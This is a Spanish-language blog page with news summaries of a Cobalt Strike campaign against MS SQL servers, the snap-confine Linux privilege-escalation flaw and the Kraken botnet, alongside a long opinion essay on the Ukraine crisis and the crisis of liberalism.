Saltar al contenido

Anonymous Chile

¡Seguimos de pie, seguimos en la lucha, firmes como siempre, en pie de guerra!

  • RSS Feed
  • Sobre nosotros
  • Medios de contacto

Hackers instalan backdoor en Microsoft SQL Server

Publicada el 14/03/2022 - 14/03/2022 por Anonymous Chile

Algunos servidores vulnerables de Microsoft SQL orientados a Internet están siendo atacados por actores de amenazas como parte de una nueva campaña para la implementación de cargas Cobalt Strike en hosts comprometidos. Esta campaña incluye ataques de fuerza bruta y ataques de diccionario contra servidores mal administrados, según reporta la firma de ciberseguridad con sede en Corea del Sur AhnLab Security Emergency Response Center.

Cobalt Strike es un marco comercial de pruebas de penetración con todas las funciones que permite a un atacante implementar un agente llamado “Beacon” en la máquina de la víctima, otorgando al operador acceso remoto al sistema. Si bien esta es una herramienta legítima, múltiples grupos de hacking la ha utilizado activamente con fines maliciosos. Según menciona el reporte, el malware escanea el puerto 1433 para verificar si hay servidores MS SQL expuestos para realizar ataques de fuerza bruta o de diccionario contra la cuenta del administrador del sistema en un intento por iniciar sesión.

Eso no quiere decir que los servidores a los que no se puede acceder a través de Internet no sean vulnerables, pues los hackers usan el malware LemonDuck para escanear el puerto y moverse lateralmente a través de la red. Los investigadores mencionan que el uso de contraseñas inseguras o predeterminadas puede resultar más peligroso para los administradores afectados.

Al obtener acceso a los sistemas vulnerables, los hackers generarán un shell de comandos de Windows a través del proceso MS SQL “sqlservr.exe” para descargar la carga útil de la siguiente etapa que alberga el binario Cobalt Strike codificado en el sistema.

Finalmente, los atacantes decodifican el ejecutable Cobalt Strike y realizan una inyección en el proceso legítimo Microsoft Build Engine, abusado en otras campañas para la entrega de troyanos de acceso remoto (RAT) y malware para el robo de contraseñas de los sistemas afectados. La carga Cobalt Strike que se ejecuta en MSBuild.exe viene con configuraciones adicionales para evadir la detección del software de seguridad. Esto es posible cargando “wwanmm.dll”, una biblioteca de Windows para WWan Media Manager, luego escribiendo y ejecutando Beacon en el área de memoria de la DLL.

20.874 comentarios

Vulnerabilidad LPE en sistemas GNU/Linux mediante snap-confine

Publicada el 11/03/2022 - 07/03/2022 por Anonymous Chile

Especialistas en ciberseguridad de la firma Qualys detallan la detección de múltiples vulnerabilidades en el sistema de implementación y empaquetado de Snap. Según el reporte, las fallas residen en la función de confinamiento rápido en los sistemas operativos Linux y su explotación maliciosa permitiría a los actores de amenazas realizar ataques de escalada de privilegios.

Snap fue desarrollado por Canonical para sistemas operativos que GNU/Linux. Según los expertos, los paquetes llamados snaps y la herramienta para usarlos, snapd, funcionan en una variedad de distribuciones de Linux y permiten que los desarrolladores de software distribuyan sus aplicaciones directamente a los usuarios.

Para ser específicos, los snaps son aplicaciones independientes que se ejecutan en un espacio aislado con acceso mediado al Snap-confine es un programa utilizado internamente por snapd para construir el entorno de ejecución de las aplicaciones snap.

Identificada como CVE-2021-44731, la más severa de estas vulnerabilidades puede ser explotada para permitir una escalada de privilegios local (también conocido por su nombre en inglés Local Privilege Escalation) y obtener acceso avanzado con permisos de superusuario al host vulnerable. La firma de seguridad Qualys pudo demostrar la falla empleando un exploit que les permitió obtener acceso root a instalaciones Ubuntu con configuraciones predeterminadas.

Al respecto, Canonical menciona que gracias a las actualizaciones automáticas emitidas por los equipos de seguridad, la mayoría de las instalaciones de plataformas distribuidas instantáneamente en el mundo ya deberían haber sido aseguradas. Además de CVE-2021-44731, se detectaron otras 6 vulnerabilidades que podrían haber sido explotadas bajo condiciones determinadas.

Por el momento no hay soluciones alternativas para mitigar el riesgo de explotación, aunque los expertos mencionan que el hecho de que la falla deba ser explotada por actores de amenazas locales limita el riesgo de ataque. No obstante, los hackers maliciosos pueden iniciar sesión como usuarios sin privilegios, lo que hace que el riesgo sea considerable.

Los administradores de implementaciones afectadas deben recordar que la explotación exitosa permitiría el despliegue de ataques de malware, extracción de datos confidenciales y ataques de movimiento lateral. Aunque esta clase de fallas siempre son consideradas como un problema severo, la explotación local hace muy poco probable su explotación en escenarios reales.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

8.927 comentarios

Perspectiva sistémica de la crisis ucraniana

Publicada el 10/03/2022 - 05/03/2022 por Anonymous Chile

Quizás habría que comenzar estas breves notas partiendo de hacer explícita una consigna: el imperialismo es imperialismo con independencia de si la potencia que lo practica es Estados Unidos, Francia, China o Rusia. Hoy, en medio de la que probablemente es la campaña mediática más grande en la historia de la comunicación política moderna desde los tiempos de las dos guerras mundiales y de la invasión estadounidense a Vietnam, recordar y sostener con firmeza esta simple constatación de hechos es, por lo menos para las izquierdas del mundo, el principio ético y político mínimo al cual debe de apelarse si de manera auténtica y con espíritu crítico se aspira a construir un mundo mucho más democrático, más igualitario, más libre y socialmente justo. Ningún sentimiento antiestadounidense, antioccidental, antirruso, antichino, o similares y derivados, para quienes militan en la defensa de estas causas, nunca debería de ser suficiente pretexto para justificar y conceder legitimidad a una agresión armada, ya sea que ésta se produzca entre grandes potencias, entre superpotencias y sociedades periféricas o sólo entre periferias. El sufrimiento y la miseria que causa la violencia desatada por toda guerra de agresión, entre las masas más empobrecidas y explotadas, sencillamente no vale su defensa.

Dicho lo anterior, y reafirmando que tan condenable es la postura adoptada en Occidente acerca de Ucrania como lo es la rusa, valdría la pena anotar un par de reflexiones que coadyuven a esclarecer, por lo menos, una porción de realidad dentro del enorme cúmulo de acontecimientos que en los últimos días se han sucedidos los unos a los otros de manera intempestiva y a menudo caótica. Pero ello no, por supuesto, con la pretensión de querer agotar el tema y defender aquí respuestas definitivas a problemas que en su mayor parte aún se siguen desarrollando, sino, antes bien, ofreciendo un par de coordenadas de lectura que sirvan a la opinión pública, en general, para arrojar un poco de luz sobre esa espesa bruma que rodea no tanto a los acontecimientos sobre el terreno ucraniano, sino, antes bien, a la narrativa de los hechos en el nivel internacional y a la manera en que las masas, en su rol de espectadoras, reciben esa información y la procesan para tomar decisiones que directa o indirectamente impacten en el curso de la situación.

Es claro, por ejemplo, que, aunque en lo que va del siglo XXI la humanidad ha atestiguado el comienzo de un número relativamente amplio de intervenciones bélicas que van desde la aniquilación de Irak y Afganistán, a comienzos del milenio, entre 2001 y 2003; hasta la avanzada balcanización de Siria —aún en curso—, desde el 2011; pasando por la destrucción del Magreb africano, desde 2010; el aplastamiento de Yemen, desde 2014; o cualquiera de los conflictos aún activos a lo largo y ancho de África, desde hace décadas; en ninguno de esos casos, el flujo de información que se hizo correr entre las distintas sociedades que habitan este planeta llegó a alcanzar las proporciones a veces abismales que sí se han observado en relación con la cobertura de los hechos en Ucrania en los últimos meses.

Razones que expliquen esta diferencia hay, por supuesto, muchas, sin embargo, son apenas un par las que en verdad dan cuenta del hecho de que aquellos conflictos y éste hayan sido objeto de la cobertura mediática tan diferenciada de la que lo fueron desde el comienzo. En primera instancia está lo evidente: desde la vuelta del siglo hasta el presente, los cambios tecnológicos que se han sucedido a lo largo y ancho del mundo (lo cual incluye desde el acceso en masa a equipos de comunicación hasta la cobertura y la penetración de las redes informáticas que los entrelazan en ese enorme espacio que es la virtualidad) se han dado no bajo una lógica de multiplicación y mejoramiento aritmética, sino geométrica, dando pasos enormes en muy poco tiempo, y derivando en la formación de amplísimos complejos poblacionales cautivos del consumo de información que dichos avances han posibilitado.

En segundo lugar se halla algo que también debería de ser evidente para todo el mundo, pero que, sin embargo, no lo es: si, a lo largo de estas décadas, algunos conflictos han recibido mucha mas atención que otros, ello se debe no únicamente al estatuto de poder que en la sociedad internacional ostentan algunos de los actores involucrados (particularmente los agresores, como Estados Unidos, Francia o Rusia), sino, sobre todo, a las herencias coloniales que atraviesan las escalas de valores (morales y políticos) de las sociedades occidentales y que, no muy en el fondo, condicionan (según criterios primordialmente raciales) que a unas sociedades se las considere mucho más importantes y valiosas que otras, derivando en que los grados de atención que se le concedan a unos acontecimientos sean mayores que la cobertura noticiosa de otros; jerarquizando la valoración que se hace del sufrimiento humano ajeno.

De ello da cuenta, por ejemplo, una única constatación de hechos: desde el desmantelamiento formal del Apartheid en Sudáfrica, hacia 1991; y el genocidio en Ruanda, alrededor de 1994; ningún otro acontecimiento —que no tenga que ver con temas derivados de la guerra en contra del terrorismo, pero incluso tampoco en esos casos— en ese basto continente que es África, ha recibido una cobertura noticiosa ni siquiera remotamente parecida a la que desde hace meses goza Ucrania, a pesar de que en muchos de los fenómenos que ahí han tenido lugar —desde hace tanto tiempo, de manera ininterrumpida— han dado muestras sistemáticas de no ser menores, en cuanto al sufrimiento y la miseria sociales por ellos generados, respecto de lo que desde hace ocho años ha sido posible observar en la región del Donbás ucraniano.

(De no haber sido porque el Apartheid involucraba a uno de los mayores imperios coloniales en la historia moderna, Inglaterra; y porque en el genocidio ruandés se demostró, una vez más, el patético servilismo de Naciones Unidas ante la política exterior estadounidense, arrastrando a dicha organización a la total inmovilidad; de hecho, quizá ni siquiera esos dos casos habrían captado la atención del mundo como lo llegaron a hacer por un breve lapso de tiempo).

¿Y qué decir, por ejemplo, de los golpes de Estado experimentados en la historia reciente de América Latina?, ¿o de los excesos y los crímenes cometidos por los Cascos Azules de Naciones Unidas en Haití?, ¿o de las campañas militares en el sudeste asiático, financiadas y diplomáticamente respaldadas por Estados Unidos y sus principales aliados en el resto de Occidente, que apenas y son noticia estelar por un par de días, quedando relegadas con el tiempo a poco menos que menciones marginales con la intención de actualizar el tema, pero no de hacerlo un problema de debate general? En todas estas situaciones, o sus similares y/o derivadas, un denominador común es claro: entre más lejana se sienta para Occidente la cultura y la historia de una sociedad periférica, excolonial, (a pesar de su enorme importancia geopolítica), menor relevancia mediática suelen despertar sus problemas entre la comunidad internacional, en general; y en el seno del —con arrogancia— así autodenominado mundo libre, en particular.

Ucrania, por supuesto, no se halla del todo en esta situación. Y es que si bien es cierto que hoy Europa se desvive en palabras de aliento para su sociedad, en llantos de políticos y de políticas supuestamente motivados por la impotencia y, por si eso no fuese poco, en campañas mediáticas del tipo #TodosSomosUcrania/#SOSUcrania (por no entrar en materia de financiamiento a la guerra y en el envío de materiales bélicos fulminantes), la realidad de la cuestión es que históricamente Europa occidental ha tenido un trato con esa sociedad como si ella misma fuese de segunda categoría (algo así como un resabio de aquello que hasta antes del siglo XIX se seguía denominando como el Oriente Próximo, el Oriente aún en condición de barbarie que, sin embargo, geográficamente se hallaba dentro de los límites del continente europeo).

De ahí, precisamente, emerge esa suerte de ambigüedad —ya señalada por el presidente ucraniano, Volodímir Zelenski, cuando acusó a Occidente de haber dejado a su país solo ante el abismo de la guerra, luego de que durante meses ese mismo Occidente saturó la discusión pública internacional con su virulenta retórica de apoyo incondicional a Ucrania ante cualquier posible agresión—, en la que en el discurso y en los gestos simbólicos intrascendentes Ucrania parece hallarse en el centro de todas las preocupaciones morales de Europa, pero sin llegar a importar tanto como para que el continente arriesgue una guerra general en contra de Rusia por su defensa; en los hechos, en las condiciones materiales de miseria y de sufrimiento que genera la profusión de violencia desatada por la guerra.

Pero hay más en todo esto, pues si bien es verdad que hoy Ucrania ostenta un estatuto de enorme relevancia discursiva y simbólica en muchas partes del mundo (en el grueso de las sociedades occidentales), ello no se debe únicamente a esta lógica colonial —como se ha señalado desde las posturas más abiertamente coloniales y racistas concebibles—, a que en Donetsk y Lugansk estén muriendo o sufriendo personas blancas, de cabellos rubios y ojos azules (o claros). Y es que, si esa fuese toda la lógica detrás de la alineación de intereses que hoy parece haber entre las políticas exteriores de Estados Unidos, por un lado; y de sus principales aliados en el seno de la OTAN, por el otro; sencillamente no se comprendería por qué ante el desmembramiento, en 1999, de la exrepública de Yugoslavia, por ejemplo, ese mismo Occidente no se tocó el corazón para retractarse de sus sistemáticos e indiscriminados bombardeos en el marco de una guerra nunca declarada, pero llevada a cabo por una Organización que insiste en reafirmar su carácter puramente defensivo, aunque siempre que ha accionado sus armas ha sido para agredir a otros pueblos.

¿Qué sucede en el contexto actual, entonces, que entre las sociedades occidentales facilita la impresión de que Ucrania es un Estado de enorme relevancia para Europa y para Estados Unidos desde siempre, no por valoraciones estratégicas y por cálculos geopolíticos coyunturales, sino, antes bien, por su simple ubicación geográfica y por su vinculo histórico con la Europa de Francia, de Alemania, de Reino Unidos, etc.?, ¿por qué de pronto toda la prensa internacional, las redes sociales y los medios de comunicación masiva parecen sentir un fervor patriótico de alcances insospechados por el pueblo ucraniano?, ¿de dónde provienen ese —supuesto— amor y esos sentimientos —pretendidamente— altruistas que parecen unificar al género humano, más allá de todas las diferencias ideológicas, de clase, coloniales, etc., alrededor de una casa: la paz en Ucrania?, ¿y por qué de pronto la unidad de la humanidad en una sola voz y en un solo reclamo —que tanto se exigía, por ejemplo, desde América Latina cuando se hallaba bajo el asedio de los intereses estadounidenses, pero que nunca se atendió, justo como hoy no se atienden los reclamos del sufrimiento en África— hoy aparece espontánea y recubierta como con una suerte de velo de nobleza que no admite cuestionamiento alguno en su contra?

Obviando los puntos señalados en líneas previas (acerca de los cambios en el seno de la matriz tecnológica del mundo y en lo concerniente a las herencias coloniales que atraviesan las valoraciones morales y políticas de las sociedades que alguna vez fueron colonizadas o que colonizaron a otros pueblos); es claro que la respuesta no se halla, tampoco, en la extensión y la profundidad que han alcanzado fenómenos tan nefastos y cuestionables como lo son aquellos que gravitan alrededor del activismo virtual (eso que patéticamente, hoy, ha conducido a tantos y tantas en ente mundo a envolver a sus identidades digitales en la bandera ucraniana). Algo hay, sin duda, de ello, pero no lo explica todo, porque, en general, no es ahí en donde se están definiendo los puntos centrales de la conversación.

Una hipótesis plausible que escapa a esa trampa que lo reduce todo al ciber activismo tiene que ver con el hecho de que el mundo se encuentra atravesando por una crisis multidimensional (sistémica) dentro de la cual, además, se desarrolla una crisis igual de profunda que tiene que ver con la ideología que hasta hace poco era la hegemónica a lo largo y ancho del planeta (el liberalismo) y con el sentido (histórico, político, cultural, etc.) que ésta posibilitaba y que, con su degradación, también se ha ido desarticulando. En este sentido, pues, que el capitalismo moderno se encuentre atravesando por una crisis sistémica de su lógica de funcionamiento implica, entre otras cuestiones, que, en el plano internacional, el grueso de sus actores principales tiene una mucho mayor propensión a tomar decisiones y ejecutar acciones más arriesgadas, y que por regla general no se tomarían en medio de un contexto de relativa estabilidad.

Ello sucede así porque es la propia crisis la que arrastra a esos actores internacionales (como son los Estados y las corporaciones transnacionales) a hacer valoraciones de todo tipo gravitando alrededor de la idea de que serán las decisiones más arriesgadas las que permitan su propia supervivencia en el seno de la arena internacional, profundamente competida y ampliamente disputada por una multiplicidad y una diversidad de intereses en conflicto. Piénsese, para dar cuenta de esto, por ejemplo, en que es el progresivo agotamiento de recursos naturales estratégicos (como las tierras aún fértiles para el cultivo, los cuerpos de agua dulce, los yacimientos de gas, petróleo y litio, etc.) a nivel planetario lo que arrastra a los grandes capitales con inversiones en esos rubros (y con ellos a las potencias globales que los respaldan) a desplegar políticas empresariales de competencia por su explotación mucho más agresivas y arriesgadas, habida cuenta de que es su supervivencia, en tanto que grandes complejos corporativos, la que depende de que logren apropiarse de ellos antes que cualquier otro actor lo haga y, sobre todo, previendo que su existencia en tiempos futuros mucho más críticos dependerá de que en el presente tomen previsiones a mediano y largo plazo. (La disputa por los energéticos entre capitales estadounidenses, chinos, rusos y europeos, o entre cualquiera de esos y los pueblos de la periferia, son apenas dos ejemplos claros de esta lógica).

Que este tipo de conflictividad se dé, además, dentro del marco de un contexto en crisis multidimensional (ecológica y climática, económica, política, alimentaria, energética, etc.) supone, en primera instancia, que la racionalidad detrás de cada decisión tomada por la mayor parte de los actores internacionales relevantes no siempre será sencilla de descifrar, toda vez que, al hallarse el propio contexto global en una situación de mayor inestabilidad y de mucha más irritabilidad, las decisiones tomadas por esos actores deben ser objeto de ajustes constantes, a menudo sucediéndose los unos tras los otros en lapsos temporales sumamente breves. En segundo lugar, ello también supone que los impactos desencadenados por eventos o acontecimientos de distinta magnitud no se corresponderán, de manera mecánica, proporcionalmente, con la naturaleza del evento o del acontecimiento en cuestión; es decir, ello implica que sucesos en apariencia intrascendentes en realidad podrían llegar a generar grandes impactos en escalas internacionales, mientras que grandes y estruendosos sucesos más bien podrían no alterar el rumbo de los hechos en absoluto.

Piénsese, por ejemplo, para cobrar conciencia de esto con mayor claridad, en dos eventos de diferente magnitud que, en su momento, cada cual tuvo consecuencias desproporcionadas en relación con su naturaleza misma: el asesinato del archiduque Francisco Fernando de Austria, en 1914, fue pretexto suficiente (no la causa subyacente) para desencadenar una guerra general en Europa porque el contexto imperante ya se encontraba, justo, atravesando por una aguda crisis desde hacía bastantes décadas previas al asesinato del archiduque. En contraste, en 1968, la invasión de Checoslovaquia por parte de la Unión Soviética no fue un suceso con la suficiente potencia como para arrastrar al mundo, o por lo menos a Europa occidental, a una nueva conflagración de amplias proporciones. Es decir, si entre cada suceso y las consecuencias que terminó desatando parece no existir una correspondencia, una correlación de proporcionalidad (a mayor envergadura, mayor impacto, y viceversa), eso se debe a la inestabilidad y a la propia irritabilidad del contexto en un momento de crisis (coyuntural o sistémica).

En tercer lugar, todo esto también supone que, desde la perspectiva de un espectador externo o de una espectadora externa (como lo sería cualquier persona de a pie en una sociedad como la mexicana) esos ajustes constantes se lleguen a percibir reiteradamente como acciones y reacciones por completo caóticas; como señales contradictorias en las que un mismo actor puede estar defendiendo una postura determinada en un momento específico, y al siguiente ubicarse en un extremo opuesto o divergente del original.

Es ahí, de hecho, en donde se halla el quid de la cuestión concerniente a la crisis por la que atraviesa el liberalismo en tanto que ideología —hasta hace muy pocos años— hegemónica detrás de la racionalidad capitalista. ¿Qué significa esto y por qué es importante abordar el tema para comprender con mayor precisión lo que está ocurriendo en la arena internacional, a propósito de la crisis en Ucrania y la constante confrontación que ello desencadena entre las grandes potencias del mundo? A lo largo de los últimos meses y, sobre todo, en lo que va desde que Rusia avanzó militarmente sobre la región ucraniana del Donbás, la mayor parte de las explicaciones que se han dado acerca del tema (en una proliferación también inédita de expertos y expertas en geopolítica de la noche a la mañana) han tendido a gravitar alrededor del análisis geográfico (de la ubicación espacial de Ucrania entre Europa y Rusia) y de las implicaciones que el conflicto tiene en la definición de rutas comerciales, de proyectos de infraestructura energética y del despliegue de posiciones militares estratégicas en dicho territorio.

Es claro, en ese sentido, que el problema de la crisis ucraniana es de carácter geopolítico, propiciado por el enfrentamiento entre grandes potencias globales que, para no ver afectada su propia integridad territorial, optan por encararse, a manera de proxywar, en un territorio intermedio. De ahí, por supuesto, a la necesidad de hablar sobre hegemonías y contrahegemonías, hay apenas un paso. Sin embargo, lo que parece no quedar claro en el grueso de todos esos análisis es que todo fenómeno geopolítico tiene un correlato de tipo ideológico (geocultural); después de todo, para que la hegemonía sea tal, y para que un determinado sistema social (nacional, regional e internacional) sea aceptado por la propia humanidad que lo experimenta en su vida cotidiana como legítimo y como un sistema en el que vale la pena vivir, en el fondo de la cuestión debe de hallarse un núcleo de ideas compartidas, de sentidos comunes generalizados, sincréticos, pero relativamente coherentes, que le permitan a esa misma humanidad ser consciente de su lugar en el mundo, ser consciente de dónde viene y hacia dónde va y, por supuesto, ser consciente de aquello que es justo y aquello que no lo es, de aquello que es legítimo y lo que no lo es, de aquello que es soportable vivir y de lo que no lo es, de aquello que hay que hacer para garantizar cierta estabilidad en su existencia y de lo que la coloca en peligro o en una situación de riesgo.

Durante poco más de siglo y medio, la ideología que permitió mantener estable al sistema global, en su conjunto, más allá de sus propias crisis coyunturales (cíclicas), fue el liberalismo, en tanto que logró, a lo largo del tiempo y del espacio (vía el colonialismo) desde su nacimiento en el marco de la Revolución francesa, generar ciertos consensos políticos y culturales capaces de contener a la conflictividad social dentro de ciertos márgenes —relativamente amplios— por completo regulables. De ahí, precisamente, que, si en algún momento de la historia, en el plano internacional, resultaba bastante más sencillo valorar lo que era una guerra de agresión y un levantamiento armado de resistencia ante una agresión, o, en su defecto, era más fácil hallar un consenso sobre lo que significaba vivir en un contexto de paz, de seguridad y de estabilidad; eso fue posible sólo porque existían una serie de ideologemas compartidos ordenando la realidad para que ésta hiciera sentido en la conciencia de las personas, confiriéndole una dirección o una trayectoria determinada a su actuar político en la cotidianidad.

Esa capacidad del liberalismo, sin embargo, está en crisis; lo ha estado desde hace cuatro o cinco décadas. Y el conflicto en Ucrania lo ejemplifica de manera clara en dos sentidos. En primera instancia, esto se videncia en las dificultades por las que constantemente han tenido que atravesar las y los principales líderes de las grandes potencias occidentales para orientar la economía, la cultura y la política en el nivel internacional. Y es que, como el significado de las palabras, de los términos, de las categorías y de los grandes conceptos que con anterioridad ordenaban al mundo hoy ya no parecen ser tan claros, tan unívocos y tan evidentes en y por sí mismos como lo parecían ser hasta hace un par de décadas, reestablecer esas ideas comunes ha sido una de las principales dificultades por las que todo proyecto hegemónico de nuevo cuño ha tenido que pasar. Piénsese, por ejemplo, en que hoy ya no parece tan evidente ni tan natural —como se pensaba antes— que en verdad existan las razas entre humanos, o que existan diferencias naturales entre construcciones sociales como el género, o que el progreso económico de la iniciativa privada es sinónimo de prosperidad para toda la humanidad, o que la naturaleza es sólo un recurso más al cual se puede explotar sin poner en riesgo la existencia de todas las especies. Lo mismo sucede con ideas como las del desarrollo, el crecimiento, la modernidad, la paz, la estabilidad, la seguridad, lo legítimo y lo ilegitimo, lo justo y lo injusto, lo moralmente aceptable y lo moralmente objetable, lo políticamente correcto y lo políticamente incorrecto.

Que en los últimos años sea el Estado chino, y no el estadounidense, el que en el plano internacional defienda con tanta vehemencia el libre mercado en su vertiente neoliberal, y con mucha mayor virulencia que la desplegada, en su momento, por Inglaterra, Austria o Estados Unidos, es, en este sentido, indicativo de que en esa misma arena internacional las grandes potencias se están disputando el derecho de definir esos nuevos sentidos comunes que habrán de legitimar el sistema social que se halla en construcción, de la mano de la inteligencia artificial, la robótica, las telecomunicaciones, la vigilancia biométrica, el BigData, el aprendizaje profundo, etcétera.

En segundo lugar, esa crisis del liberalismo también se transparenta en toda su desnudez en la manera en que el mundo reacciona de manera caótica, inmediatista, a los acontecimientos que se van sucediendo en la realidad. Y es que, acá, la carencia de marcos de referencia estables que le permitan a las masas tener por lo menos un poco de claridad sobre el significado de los eventos y los fenómenos sociales ha derivado, con el paso de los años, o bien en la adopción de un relativismo pedante y soberbio o bien en la proliferación de un cinismo indolente e intransigente. Cualquiera que sea el caso, y en ambas situaciones, sin embargo, una cosa es segura, lo mismo el relativismo que el cinismo contemporáneos han terminado por minar hasta sus entrañas las capacidades sociales de reconocer colectivamente las condiciones de posibilidad de toda afirmación de verdad cuando se trata de esclarecer problemáticas con posturas encontradas, mutuamente excluyentes e irreducibles las unas a las otras. El problema acá es, por lo tanto, la interpretación y el significado que se da a los acontecimientos, y no tanto el acontecimiento en y por sí mismo.

Es claro, a propósito de lo anterior, por ejemplo, que el ejército ruso y el ucraniano se hallan en guerra, ¿pero es esa situación producto de la legitima defensa de Rusia ante el constante hostigamiento militar de la OTAN sobre sus fronteras o sencillamente un acto más de expansión territorial? El evento en cuestión, aquí, es claro, pero no es eso lo que define la discusión pública internacional, sino la disputa por el significado que la movilización de tropas tiene; lo cual remite, necesariamente, a tener que discutir sobre conceptos como legitimidad, seguridad, justicia, soberanía, estabilidad, etc., que —hay que insistir— hoy no son tan claros porque se encuentran bajo el asedio lo mismo por parte de ese relativismo que dice que todas las posturas son igual de respetables y legitimas que por parte de ese cinismo que condena la guerra haciendo la guerra. La discusión tan profusa que en los últimos días se ha dado acerca de la hipocresía de las sociedades occidentales (con sus amplísimos registros históricos de guerras de agresión, de golpes de Estado, de expansiones coloniales, de conquistas territoriales, cometidos por ellas en contra de sociedades periféricas) que hoy condenan los pecados que ellas mismas han cometido y de los cuales aún no se redimen es indicativa de este problema en toda su profundidad.

Algo similar ocurre en el seno del debate político estadounidense, en donde, por absurdo y trágico que parezca, son los ideólogos y las ideólogas del conservadurismo quienes en estos días han ofrecido al público aproximaciones, lecturas e interpretaciones mucho más mesuradas, decantadas y meditadas sobre la sucesión de eventos en la arena internacional. Así, por ejemplo, mientras que personajes como Joe Biden no se cansan de repetir que el mundo libre está en peligro a causa de Rusia y la que califica como la peor catástrofe bélica en la historia reciente del mundo (obviando Irak, Afganistan, Egipto, Libia, Tunez, Yemen, Siria), el ala conservadora de la política de aquella nación se preocupa por preguntar por qué ese mismo juicio histórico no se hizo cuando el gobierno estadounidense mintió acerca de las armas de destrucción masiva en Irak y Afganistán o, en una línea de ideas similar, por qué el mundo libre no se alineó como lo hace hoy ante cualquiera de las agresiones cometidas en el extranjero por parte de las fuerzas armadas estadounidenses; operaciones, por lo demás, justificadas a partir de argumentos que o no eran verdad en absoluto o eran verdades a medias que ocultaban agendas e intereses ilegítimos.

Pensando este caso en perspectiva global, no tendría que sorprender, en consecuencia, la fortaleza con la que se está haciendo el conservadurismo en la mayor parte de Occidente, vía el nacimiento, el crecimiento o la consolidación de plataformas político-ideológicas de extrema derecha que, a pesar de ser eso: extremas derechas conservadoras, apuestan por definir puntos ideológicos de anclaje que ofrezcan a las masas marcos de referencia que les hagan sentir, de nuevo, que no todo es un caos, y que las cosas pueden volver a tener un orden, un sentido, una dirección y un propósito claros, con miras hacia el futuro.

Pero no sólo eso, tampoco tendría que sorprender que el conflicto en Ucrania esté siendo utilizado por todo Occidente como un pretexto o, mejor dicho, como un catalizador, que, en el plano de la política doméstica estadounidense, alemana, española, francesa, inglesa, etc., les permita a las viejas élites liberales reconstruir sus bases ideológicas de apoyo y conferirle nuevos contenidos políticos, económicos, culturales e históricos a esa ideología que profesan, y que buscan sacar del abismo en el cual se encuentra. Y es que, en efecto, si Ucrania parece haber conseguido la reunificación de Occidente como un área cultural de enormes proporciones con una postura más o menos concertada sobre asuntos que competen al resto del mundo, eso, en realidad, más que ser una consecuencia directa del conflicto ucraniano, parece ser el resultado de un esfuerzo colectivo, echado a andar por intereses particulares, con miras a minar los apoyos que ideologías adversas o divergentes (como el conservadurismo y la diversidad de las izquierdas) están captando en estos tiempos. La forma en que eso se está maquinando es a través de la demonización de Rusia como un agente del mal (nótese la primacía del juicio moral aquí) ante el cual todas las fuerzas del bien deben de unificarse: de ahí, justo, que también se pase a condenar al ostracismo y a demonizar en la misma proporción a cualquier actor político, nacional e internacional (o sencillamente a cualquier persona) que no se sume a ese concierto de voces encabezadas por los adalides del mundo libre.

La fórmula es vieja, porque así es como se asimiló, en los sesenta, a las juventudes y a las y los estudiantes de todo el mundo con el fantasma del supuesto comunismo soviético (aunque de comunista la Unión Soviética no tuvo nada), justificando su represión armada y su aniquilamiento político en el marco de las revueltas del 68. Hoy, Rusia sirve de chivo expiatorio para llevar a cabo dos asimilaciones contrarias entre sí: por un lado, todo aquel y toda aquella que no condene enérgicamente a Rusia (y particularmente a Putin) en el sentido en que lo hacen la OTAN o el gobierno de los Estados Unidos, es un potencial agente del mal al que también hay que silenciar (como está sucediendo con la censura placada por Alphabet-Google, Twitter y Meta) o reducir a la condición de paria; y, por el otro, en tanto que Rusia, para ese supuesto mundo libre, sigue siendo la principal fuente de emanación del comunismo internacional, cualquier respaldo que se de a sus acciones también es asimilado, en el resto del mundo, como una potencial amenaza comunista que atenta en contra de las libertades Occidentales y su modus vivendi.

No hay que profundizar más, por eso, para comprender el peligro que corren todas las sociedades el rededor del mundo al celebrar las respuestas que Occidente está dando para aislar a Rusia del resto del sistema internacional: y es que, en el fondo, hay que entender que hoy es Rusia la potencia a la cual le toca resistir ese nado sincronizado de un Occidente ensoberbecido con sus delirios de superioridad moral, pero en el futuro, cada acto que hoy se celebre será usado como un precedente para llevar a cabo campañas globales de intereses alineados en contra de cualquier posible amenaza. El mundo acaba de experimentar algo similar a esto cuando las BigTech (las enormes corporaciones del ramo de la tecnología de punta: Twitter, Microsoft, Google, Facebook, etc.) hicieron hasta lo imposible por reducir al ostracismo a la figura de Donald Trump, argumentando que el expresidente estadounidense era una amenaza excepcional que requería medidas igual de excepcionales y extraordinarias. Y sin embargo, pasada la tormenta, cuando las masas opositoras a Trump celebraron su actuar en contra del exmandatario, ellas mismas fueron objeto de políticas empresariales similares a las que las BigTech emplearon en contra de Trump.

¿Cuánto de lo que hoy Occidente hace en contra de Rusia no se hará, también, en contra de cualquier otro actor internacional que le suponga un desafío o una incomodidad en el futuro?

46 comentarios

ZeroFox reporta poderosa botnet capaz de infectar y controlar millones de dispositivos rápidamente

Publicada el 09/03/2022 - 06/03/2022 por Anonymous Chile

El grupo de investigación de ZeroFox Intelligence descubrió una nueva botnet que, si bien parece seguir en fase de desarrollo, cuenta con avanzadas capacidades para la ejecución de cargas útiles, ejecución de comandos shell y registro de las pantallas de los dispositivos afectados.

Identificada como Kraken, la botnet usa el malware SmokeLoader para instalar cargas maliciosas posteriores y comenzar a propagar la infección hacia otras implementaciones vulnerables. Los investigadores mencionan que esta campaña no tiene relación alguna con otra botnet también conocida como Kraken, detectada en 2008.

El equipo responsable de la investigación considera que el código de esta botnet no parece ser muy sofisticado, aunque se distingue porque experimenta con la inclusión de algunas características de hacking avanzadas, incluyendo:

  • Persistencia en el sistema afectado
  • Recopilación de información sobre el host para el registro
  • Descarga y ejecución de archivos
  • Ejecución de comandos shell
  • Robo de direcciones de criptomoneda
  • Capturas de pantalla

Los investigadores reportan que esta botnet se originó a partir de un código cargado en GitHub en octubre de 2021. Por el momento se desconoce si este perfil en el repositorio pertenece al operador de la botnet o si solo se usó este código para el desarrollo de la botnet.

Kraken se propagó originalmente en archivos RAR SFX autoextraíbles descargados usando el malware SmokeLoader. Estos archivos SFX contenían una versión empaquetada con UPX de Kraken, RedLine Stealer y otro binario utilizado para eliminar Kraken. Las versiones actuales de Kraken ahora son descargadas directamente por SmokeLoader.

Desde su detección inicial, se han reportado múltiples versiones del panel de control de Kraken, aunque no tiene una interfaz basada en web para la interacción con la botnet.

